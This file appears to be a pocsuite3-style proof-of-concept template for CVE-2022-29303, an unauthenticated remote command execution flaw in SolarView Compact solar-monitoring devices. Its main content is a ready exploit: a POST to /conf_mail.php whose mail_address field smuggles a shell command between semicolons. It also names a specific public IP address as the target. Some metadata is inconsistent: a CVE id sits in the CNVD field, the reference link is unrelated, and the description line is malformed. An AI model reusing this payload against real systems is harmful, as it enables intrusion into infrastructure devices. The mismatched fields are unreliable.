CLASSNAME = 'SolarView_Compact_CVE_2022_29303'
VUL_ID = 'LDY-2022-00097098'
VUL_DATE = '2022-05-12'
CREATEDATE = '2022-12-30'
UPDATEDATE = '2022-12-30'
APP_NAME = 'SolarView-Compact'
VUL_NAME = '远程命令执行(RCE)' #漏洞名称
VUL_NUM  = '' #漏洞编号
CVE_NUM = '' #CVE编号
CNVD_NUM = 'CVE-2022-29303' #CNVD编号
VUL_TYPE = 'CODE_EXECUTION' # 必填，漏洞类型，参考 pocsuite3 VUL_TYPE的取值范围
POC_CATEGORY = 'EXPLOITS.WEBAPP' # 必填，漏洞分类，参考 pocsuite3 POC_CATEGORY的取值范围
SEVERITY = 'Critical' # 必填，严重等级，取值范围 Critical , High , Medium, Low
REQAUTH = 'False' # 必填，boolen值，该漏洞验证或利用是否需要先认证
FINGERPRINT_NAMES = 'SolarView-Compact' # 必填，当命中哪些指纹后，可使用该poc。列表中是指纹的名称
APP_MAIN_PORT = '80' # 必填，该应用的默认配置端口，用于快速扫描模式，若无法确认可以写80
APPVERSION = 'SolarView-Compact<6.0' # 必填，漏洞影响的版本号
APP_POWER_LINK = 'https://solarview.com.br' # 非必填，应用厂商链接
DESC = 太阳能发电监视系统:'强调“ 可视化”基本功能，可快捷实现的系统。发电量概况显示的基本画面、宣传环保活动的内容软件(5 种)、以及和任意图像组合，可简单制作幻灯片视频。此外，通过连接互联网，还可以实现在远程显示发电量、用邮件通报设备异常等功能。'
SUGGEST = '厂商已发布更新，请及时关注:https://solarview.com.br/'
HASEXP = 'True' # 必填，boolen值，是否包含exp
TARGETS = 'http://153.156.244.87' # 必填，该Poc适用的目标，string类型
SURICATA_RULES = 'IFS' # 必填，suricata格式的检测规则,这里只需要填写匹配流量包关键词即可
COMMAND = ''
FILE_PATH = '#' #如果不使用file_path=传shell地址，可以使用"#"进行传参数
REFERENCES = 'https://www.cnvd.org.cn/flaw/show/CNVD-2013-00967' # 非必填，漏洞相关参考链接
URI = '/conf_mail.php' #payload请求uri
PAYLOAD_DATA = 'mail_address=%3B{param}%3B&button=%83%81%81%5B%83%8B%91%97%90M' #传入的data数据
METHOD = 'post' # request 请求方式 get、post
HEADERS = "{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0','Content-Type': 'application/x-www-form-urlencoded'}"
ATTACK_PAYLOAD_DATA = '1'
ATTACK_URI = "" #利用payload请求uri





